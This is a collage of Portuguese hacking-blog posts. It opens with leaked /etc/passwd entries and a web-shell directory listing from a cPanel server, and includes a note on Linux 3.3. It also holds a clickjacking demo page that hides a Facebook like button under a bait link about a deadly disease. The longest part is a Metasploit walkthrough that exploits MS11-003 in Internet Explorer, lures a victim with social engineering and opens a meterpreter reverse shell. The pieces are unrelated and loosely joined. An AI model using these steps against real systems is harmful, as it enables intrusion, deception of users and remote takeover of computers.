deboala:x:1048:1040::/home/deboala:/usr/local/cpanel/bin/noshell
admin:x:1049:1041::/home/admin:/usr/local/cpanel/bin/noshell
p8tp6vut:x:1050:1042::/home/p8tp6vut:/usr/local/cpanel/bin/noshell
domeniul:x:1051:1043::/home/domeniul:/bin/false
oradesan:x:1052:1044::/home/oradesan:/usr/local/cpanel/bin/noshell
tramvaiu:x:1053:1045::/home/tramvaiu:/usr/local/cpanel/bin/noshell
diseasei:x:1055:1047::/home/diseasei:/usr/local/cpanel/bin/noshell
fr4yp7br:x:1056:1048::/home/fr4yp7br:/usr/local/cpanel/bin/noshell
bodymark:x:1057:1049::/home/bodymark:/bin/false
phofox-shell# ls
ajax.php
core
crossdomain.php
gzip.php
image
image.php
index.html
jscript
mp3
nodb.html
paokara
ppp
ss
sss
style*
style.php
tmp
upgrade.html

phofox-shell#

Há algumas restrições: você não pode rodar pontos (“.”) e nem parêntesis (“(” e “)”).

Divertido?
Brinquem direito!

Até mais!
Autor: 0KaL

Conforme anúncio oficial no site LKML, ontem foi lançada a versão 3.3 final do núcleo (também conhecido como kernel) do Linux – a base para o desenvolvimento de todas as distribuições desse sistema operacional de código aberto.

De acordo com a publicação do Kernel Newbies, a grande novidade dessa recente edição é a fusão do código do Linux com partes das linhas de programação do Android. Essa integração, esperada há muito tempo pelos entusiastas da área, deve facilitar o desenvolvimento de softwares que funcionem em ambas as plataformas.

Além disso, o novo núcleo do Linux recebeu melhorias em muitos de seus sistemas de arquivos – aperfeiçoando o gerenciamento de memória, de rede e da virtualização de aplicativos, além de aumentar a segurança da plataforma por meio da criptografia de dados.

Falar hoje rapidamente sobre Clickjacking ou clickhijacking, que é basicamente o usuário clickar em um link mas na verdade está clickando em outro sem que ele saiba.

O clickjacking é possível por causa de três “features” do HTML.

Iframe:

Uma pagina é aberta dentro de outra.

Opacidade:

Elementos podem ter transparência, podendo ser invisíveis.

Camadas(Stacking Order):

Podemos ordenar os elementos em camadas.

Quando juntamos essas três features podemos efetuar o clickjacking, que consiste em colocar uma outra página transparente na frente do usuário, quando o usuário clickar em algum lugar, na verdade ele estará clickando na página invisível na frente dele.

Exemplo:

Para esse artigo criei uma página em html que fala sobre uma doença incurável e coloquei um link para que a pessoa veja um vídeo.

Mas na verdade existe um outro elemento invisível na frente do link “Veja o vídeo”, aumentando a opacidade podemos vê-lo.

O link na frente é um botão curtir do facebook, se o usuário estivesse logado quando clickasse, automaticamente seria postado o link configurado no mural dele.

Código usado no exemplo:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" >
<title>ClickJacking Exemplo...</title>
</head><h1 style="text-align:left">Pesquisa polêmica apresenta um tipo de tuberculose incurável</h1>
<p style="font-size: 16px;">Há algumas semanas, uma clínica em Mumbai afirmou ter identificado 12 de pacientes
 com uma cepa de tuberculose resistente a todos os tratamentos conhecidos.<br>
 Essa doença é uma infecção pulmonar muito contagiosa e mata cerca de 1,5 milhões de pessoas por ano no mundo, segundo a Organização Mundial da Saúde (OMS).<br>
 Assim, o desenvolvimento de uma forma totalmente intratável seria motivo para alarde. “Significa que não há esperança,
que nenhum medicamento funciona”, diz Madhukar Pai, que pesquisa sobre tuberculose na McGill University, em Montreal..<br> Com exclusividade tivemos acesso a um vídeo onde é mostrado a morte dos 12 pacientes infectados, as imagens foram <br>Obtidas das câmeras da ala de quarentena do hospital,
<font color="red"><a href="">Veja o vídeo</a>(Aviso de cenas fortes)</font></p>
</html>
<div style="z-index:10; opacity:0.7; position:absolute; top:165px;left:348px;"><iframe scrolling="no" style="width:75px; height:60px;" src="//www.facebook.com/plugins/like.php?href=http%3A%2F%2Fnoticias.uol.com.br%2Fc  otidiano%2Fultimas-noticias%2F2012%2F03%2F02%2Fadolescente-leva-dois-meses-para-descobrir-que-levou-tiro-na-cabeca-no-interior-de-sao-paulo.htm&amp;send=false&amp;layout=button_count&amp;width=450  &amp;show_faces=false&amp;action=recommend&amp;colorscheme=lig  ht&amp;font&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:21px;" allowTransparency="true"></iframe>

Como se proteger?

Client side:
Uso de plugins como o Noscript.
Server Side:
uma das soluções possíveis é o uso da meta tag;

<meta http-equiv="X-Frame-Options" content="deny">

Conclusão:

Esse exemplo é o mais básico possível de clickjacking, apenas para dar um vislumbre de como funciona o ataque, existem técnicas de clickjacking mais avançadas usando js, html5, etc. Em outra ocasião espero trazer pra vocês, inclusive uma técnica usando mousedrag.

Fonte(Material muito bom para quem quiser se aprofundar).
http://javascript.info/tutorial/clickjacking

http://www.hacker9.com/clickjacking-attack-things-you-must-know.html

http://www.exploit-db.com/wp-content…docs/17881.pdf

http://www.yousaytoo.com/what-is-clickjacking-learning-to-clickjack-sites-plus-methods-of-protec/1756442

http://en.wikipedia.org/wiki/Clickjacking

Até.

Autor: Animall

Olá.
Foi encontrada no famoso IEca (sim, aquele navegador que deixou de ser o mais usado do mundo) há 1 ano e 21 dias (considerando que hoje é 29/02/12), no motor HTML (Microsoft HTML Engine/mshtml), uma vulnerabilidade que permite a execução de comandos a nível do usuário local (o que significa, na maioria dos computadores com Windows, o próprio administrador).
Segundo o boletim de “segurança” da Microsoft, a execução remota de comandos ocorre “se um usuário exibir uma página da Web especialmente criada” utilizando o navegadorzinho deles.

O website do Metasploit diz que o módulo explora uma vulnerabilidade que corrompe a memória do HTML Engine. Ao analisar uma página HTML que contém uma importação CSS recursiva, um objeto em C++ é excluído e reutilizado. Em outras palavras, isto quer dizer a possibilidade da execução de código arbitrário. Já que, para bypassear DEP  (recurso de segurança da Microsoft que impede a execução de códigos de uma região da memória não-executável em um aplicativo) e ASLR [em inglês] (método que dispõe randomicamente as posições das chaves áreas de dados), ele precisa de recursos do dotNET (>=2, por ter ‘mscorie.dll’), é necessário que o alvo possua esta ferramenta instalado.
O exploit: ms11_003_ie_css_import. Vamos ver como utilizá-lo:
Abra o Metasploit Framework (eu sou fã do console, mas se você preferir interface gráfica ou web…). Vamos setar o exploit que utilizaremos:

msf > use exploit/windows/browser/ms11_003_ie_css_import

Caso você não possua este módulo, rode “msfupdate” e tente usá-lo novamente.
Agora vamos setar o payload utilizado. Pretendemos uma conexão reversa em TCP.

msf exploit(ms11_003_ie_css_import) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

Vamos dar uma olhada em suas opções (variáveis), digitando “set” e enter.

msf exploit(ms11_003_ie_css_import) > set
Module: windows/browser/ms11_003_ie_css_import
==============================================

  Name                      Value
  ----                      -----
  DisablePayloadHandler     false
  EXITFUNC                  process
  EnableContextEncoding     false
  HTML::base64              none
  HTML::javascript::escape  0
  HTML::unicode             none
  HTTP::chunked             false
  HTTP::compression         none
  HTTP::header_folding      false
  HTTP::junk_headers        false
  HTTP::server_name         Apache
  InitialAutoRunScript      migrate -f
  OBFUSCATE                 true
  SRVHOST                   0.0.0.0
  SRVPORT                   8080
  SSL                       false
  SSLVersion                SSL3
  TCP::max_send_size        0
  TCP::send_delay           0
  VERBOSE                   false
  payload                   windows/meterpreter/reverse_tcp

Vamos setar algumas variáveis que nos interessam:
IP do servidor deverá ser nosso endereço IP.

msf exploit(ms11_003_ie_css_import) > set svrhost seu.ip.aq.ui

Agora vamos setar a porta que utilizaremos e o nome do “arquivo” que será acessado. Por padrão, os navegadores acessam a porta 80. Você pode utilizá-la se quiser, mas eu optei pela porta 81 pois na porta 80 rodava o Apache e eu não queria desligá-lo (tudo bem, fiquei com preguiça de rodar um ‘/etc/init.d/apache2 stop’).

msf exploit(ms11_003_ie_css_import) > set svrport 81
msf exploit(ms11_003_ie_css_import) > set uripath ganhedinheiro.htm

Vamos agora setar o IP e a porta para os quais a conexão reversa, após o exploit trabalhar, será direcionada. Pode ser o mesmo seu endereço IP.

msf exploit(ms11_003_ie_css_import) > set lhost meu.ip.aqu.i
msf exploit(ms11_003_ie_css_import) > set lport 82

Tudo pronto? Vamos rodar o comando “exploit”:

msf exploit(ms11_003_ie_css_import) > exploit

Ele dará alguns detalhes, mas dará também isso:

[*] Using URL: http://meu.ip.a.qui/ganhedinheiro.htm

Aí está a URL “mágica”. Envie-a para o alvo e, utilizando engenharia social, faça-o acessá-la.
Quando ele acessar, aparecerá em sua janela:

[*] ip.da.vit.ima:porta Received request for "/ganhedinheiro.html"

Ele dará alguns detalhes sobre a “conversa” TCP e, no final, dará algo semelhante a isso:

[*] New server process: notepad.exe

Isto significa que ele gerou um processo chamado notepad.exe na máquina do usuário.
Vamos verificar as sessões para termos certeza de que podemos continuar.

msf exploit(ms11_003_ie_css_import) > sessions -l

Aparecerá a lista de sessões. Verifique se o alvo esta lá. Se estiver, ótimo! Pegue a ID do mesmo na primeira coluna (vamos supor que esta é 1), e vamos interagir com ele:

msf exploit(ms11_003_ie_css_import) > sessions -i 1[*] Starting interaction with 1...

Enfim, ele nos entrega o seguinte:

meterpreter >

Vamos obter algumas informações sobre o sistema, como o nome do computador, o sistema operacional, o idioma e a arquitetura:

meterpreter > sysinfo

Tudo certo até aqui? Vamos continuar e partir para a melhor parte: obter acesso ao CMD. Agora é simples, veja:

meterpreter > shell

Digitamos o comando “shell”, ele mostra alguns detalhes, e…

Microsoft Windows [Version X]
Copyright (c) 2009 Microsoft Corporation. All rights reverved.

C:\Users\unavailable\Desktop>_

Simples, não é mesmo?
Agora eu te pergunto: onde está o seu amor? (Não entendeu? Clique aqui)

Como se proteger? Bem, mantenha seu sistema sempre seguro. Impossível? Pior que sim…
Mas algumas dicas básicas podem evitar que você não seja uma vítima:
1. Mantenha sempre antivírus e firewall atualizados
2. Atualize sempre seu sistema operacional e navegador
3. Não abra links desconhecidos. Vale, às vezes, abrir o link com um ‘view-source:’ na frente, só para analisar um pouco.
4. Considere trocar para sistema operacional mais seguro e estável .

Att, 0KaL.

P. S.: Coincidência; o Jornal da Globo está falando sobre privacidade na internet.

Autor: 0KaL